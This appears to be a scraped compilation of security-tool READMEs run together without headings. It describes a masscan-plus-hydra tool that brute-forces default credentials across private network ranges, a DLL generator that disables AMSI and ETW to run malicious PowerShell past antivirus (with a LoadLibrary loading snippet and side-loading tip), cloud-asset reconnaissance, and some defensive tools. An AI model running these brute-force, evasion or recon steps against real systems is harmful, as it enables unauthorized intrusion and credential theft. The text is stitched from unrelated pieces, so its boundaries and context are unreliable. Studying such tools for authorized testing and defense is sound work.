It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purposes only.
Use masscan (faster than nmap) to find alive hosts with common ports from the network segment.
Parse the masscan result.
Generate and run hydra commands to automatically bruteforce supported network services on the devices.
Requirements: Kali Linux or any preferred Linux distribution, and Python 3.10+.
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
# Install required tools for the script
apt update && apt install seclists masscan hydra
Private IP ranges: 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12
Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>
Ex: masscan_192.168.0.0-16.txt
Example command:
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt
Example Resume Command:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt
Command Options
┌──(root㉿root)-[~/mass-bruter]
└─# python3 mass_bruteforce.py
Usage: [OPTIONS]
Mass Bruteforce Script
Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.
Quick Bruteforce Example:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt
Fetch cracked credentials:
python3 mass_bruteforce.py -s
dpl4hydra
Any contributions are welcome!
CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle enforcement on GCP cloud infrastructure. It enables DevOps and security teams to quickly clean up accounts in GCP that have been granted more permissions than they require. CureIAM fetches recommendations and insights from the GCP IAM recommender, scores them, and enforces those recommendations automatically on a daily basis. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of the GCP IAM recommender APIs and the Cloudmarker framework.
Discover what makes CureIAM scalable and production grade.
Recommendations are scored on safe_to_apply_score, risk_score and over_privilege_score. Each score serves a different purpose: safe_to_apply_score, for example, identifies whether a recommendation can be applied on an automated basis, based on the threshold set in the CureIAM.yaml config file.
Since CureIAM is built with Python, you can run it locally with these commands. Before running, make sure a configuration file is ready in one of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml, and that a service account JSON file is present in the current directory, preferably named cureiamSA.json. This SA private key can be named anything, but for the docker image build it is preferred to use this name. Make sure to reference this file in the config for the GCP cloud plugin.
# Install necessary dependencies
$ pip install -r requirements.txt
# Run CureIAM now
$ python -m CureIAM -n
# Run the CureIAM process as a scheduler
$ python -m CureIAM
# Check CureIAM help
$ python -m CureIAM --help
CureIAM can also be run inside a Docker environment; this is completely optional and can be used for CI/CD with a K8s cluster deployment.
# Build docker image from dockerfile
$ docker build -t cureiam .
# Run the image as a scheduler
$ docker run -d cureiam
# Run the image now
$ docker run -f cureiam -m cureiam -n
The CureIAM.yaml configuration file is the heart of the CureIAM engine. Everything the engine does is based on the pipeline configured in this config file. Let's break it down into different sections to make the config look simpler.
logger:
version: 1
disable_existing_loggers: false
formatters:
verysimple:
format: >-
[%(process)s]
%(name)s:%(lineno)d - %(message)s
datefmt: "%Y-%m-%d %H:%M:%S"
handlers:
rich_console:
class: rich.logging.RichHandler
formatter: verysimple
file:
class: logging.handlers.TimedRotatingFileHandler
formatter: simple
filename: /tmp/CureIAM.log
when: midnight
encoding: utf8
backupCount: 5
loggers:
adal-python:
level: INFO
root:
level: INFO
handlers:
- rich_console
- file
schedule: "16:00"
This subsection of the config uses the Rich logging module and schedules CureIAM to run daily at 16:00.
Plugins are declared in the plugins section of CureIAM.yaml. You can think of this section as the declaration of the different plugins.
plugins:
gcpCloud:
plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
params:
key_file_path: cureiamSA.json
filestore:
plugin: CureIAM.plugins.files.filestore.FileStore
gcpIamProcessor:
plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
params:
mode_scan: true
mode_enforce: true
enforcer:
key_file_path: cureiamSA.json
allowlist_projects:
- alpha
blocklist_projects:
- beta
blocklist_accounts:
- foo@bar.com
allowlist_account_types:
- user
- group
- serviceAccount
blocklist_account_types:
- None
min_safe_to_apply_score_user: 0
min_safe_to_apply_score_group: 0
min_safe_to_apply_score_SA: 50
esstore:
plugin: CureIAM.plugins.elastic.esstore.EsStore
params:
# Change http to https later if your elastic are using https
scheme: http
host: es-host.com
port: 9200
index: cureiam-stg
username: security
password: securepassword
Each of these plugin declarations has to be of this form:
plugins:
<plugin-name>:
plugin: <class-name-as-python-path>
params:
param1: val1
param2: val2
For example, the plugin CureIAM.stores.esstore.EsStore is the EsStore class in this file. All the params defined in the YAML have to match the declaration in the __init__() function of the same plugin class.
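As an illustration only (a hypothetical skeleton, not the actual CureIAM source), a store plugin whose __init__() matches the esstore params above could look like this:
class EsStore:
    """Hypothetical skeleton: each keyword argument maps to a key under params: in CureIAM.yaml."""
    def __init__(self, scheme='http', host='localhost', port=9200,
                 index='cureiam-stg', username=None, password=None):
        self._base_url = f"{scheme}://{host}:{port}"
        self._index = index
        self._auth = (username, password)

    def write(self, record):
        # The real plugin indexes audit records into Elasticsearch; omitted here.
        pass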
audits:
IAMAudit:
clouds:
- gcpCloud
processors:
- gcpIamProcessor
stores:
- filestore
- esstore
Multiple audits can be created out of this. The one created here is named IAMAudit, with four plugins in use: gcpCloud, gcpIamProcessor, filestore and esstore. Note these are the same plugin names declared in Step 2. Again, this is like defining the pipeline, not actually running it; it will be considered for running by the definition in the next step.
Finally, tell CureIAM to run the audits defined in the previous step:
run:
  - IAMAudit
And that's the entire configuration for CureIAM. You can find the full sample here; this config-driven pipeline concept is inherited from the Cloudmarker framework.
The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.
[Please do!] We are looking for any kind of contribution to improve CureIAM's core functionality and documentation. When in doubt, make a PR!
Gojek Product Security Team
Adding the version in the library to avoid any backward-compatibility issues.
Running docker compose: docker-compose -f docker_compose_es.yaml up
mode_scan: true
mode_enforce: false
MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. MemTracer is implemented in Python and aims to detect reflectively loaded native .NET framework Dynamic-Link Libraries (DLLs). This is achieved by looking for the following abnormal memory region characteristics:
The tool starts by scanning the running processes, and by analyzing the allocated memory regions characteristics to detect reflective DLL loading symptoms. Suspicious memory regions which are identified as DLL modules are dumped for further analysis and investigation.
Furthermore, the tool features the following options:
python.exe memScanner.py [-h] [-r] [-m MODULE]
-h, --help show this help message and exit
-r, --reflectiveScan Looking for reflective DLL loading
-m MODULE, --module MODULE Looking for a specific loaded DLL
The script needs administrator privileges in order to inspect all processes.
LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).
LightsOut is designed to work on Linux systems with python3 and mingw-w64 installed. No other dependencies are required.
Features currently include:
_______________________
| |
| AMSI + ETW |
| |
| LIGHTS OUT |
| _______ |
| || || |
| ||_____|| |
| |/ /|| |
| / / || |
| /____/ /-' |
| |____|/ |
| |
| @icyguider |
| |
| RG|
`-----------------------'
usage: lightsout.py [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]
Generate an obfuscated DLL that will disable AMSI & ETW
options:
-h, --help show this help message and exit
-m <method>, --method <method>
Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
-s <option>, --sandbox <option>
Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
-sa <value>, --sandbox-arg <value>
Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
-k <key>, --key <key>
Key to encode strings with (randomly generated by default)
-o <outfile>, --outfile <outfile>
File to save DLL to
Remote options:
-p <pid>, --pid <pid>
PID of remote process to patch
Intended Use/Opsec Considerations
This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.
Usage Examples
You can transfer the output DLL to your target system and load it into PowerShell in various ways. For example, it can be done via P/Invoke with LoadLibrary:
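As a rough sketch of one common approach (the DLL path below is a placeholder, not LightsOut's own snippet), loading a DLL into the current PowerShell process via P/Invoke can look like this:
$sig = '[DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr LoadLibrary(string lpFileName);'
$k32 = Add-Type -MemberDefinition $sig -Name 'Kernel32' -Namespace 'Win32' -PassThru
$k32::LoadLibrary("C:\Users\Public\lightsout.dll")   # placeholder path to the generated DLL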
Or even easier, copy powershell.exe to an arbitrary location and side-load the DLL!
Greetz/Credit/Further Reference:
During the reconnaissance phase, an attacker searches for any information about the target to create a profile that will later help identify possible ways to get into an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.
CloudPulse simplifies security assessments with a user-friendly interface. It allows you to effortlessly find a company's assets on the AWS cloud:
1- Download CloudPulse :
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Run docker compose :
docker-compose up -d
3- Run script.py script
docker-compose exec web python script.py
4 - Now go to http://:8000/search and enjoy the search engine
1- download CloudPulse :
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Setup virtual environment :
python3 -m venv myenv
source myenv/bin/activate
3- Install requirements.txt file :
pip install -r requirements.txt
4- run an instance of elasticsearch using docker :
docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1
5- update script.py and settings file to the host 'localhost':
#script.py
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
#se/settings.py
ELASTICSEARCH_DSL = {
'default': {
'hosts': 'localhost:9200'
},
}
6- Run script.py to index data in elasticsearch:
python script.py
7- Run the app:
python manage.py runserver 0:8000
Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository, clone the data, and update the data.csv file (the full dataset contains close to 9 million records).
As an example, searching for .mil data gives:
Searching for tesla, as another example, gives:
CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.
JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.
Before installing JSpector, you need to have Jython installed on Burp Suite.
Go to the Extensions tab.
Click the Add button in the Installed tab.
In the Extension Details dialog box, select Python as the Extension Type.
Click the Select file button and navigate to JSpector.py.
Click the Next button, then the Close button once the extension has loaded.
Issues created by JSpector will appear in the Dashboard tab.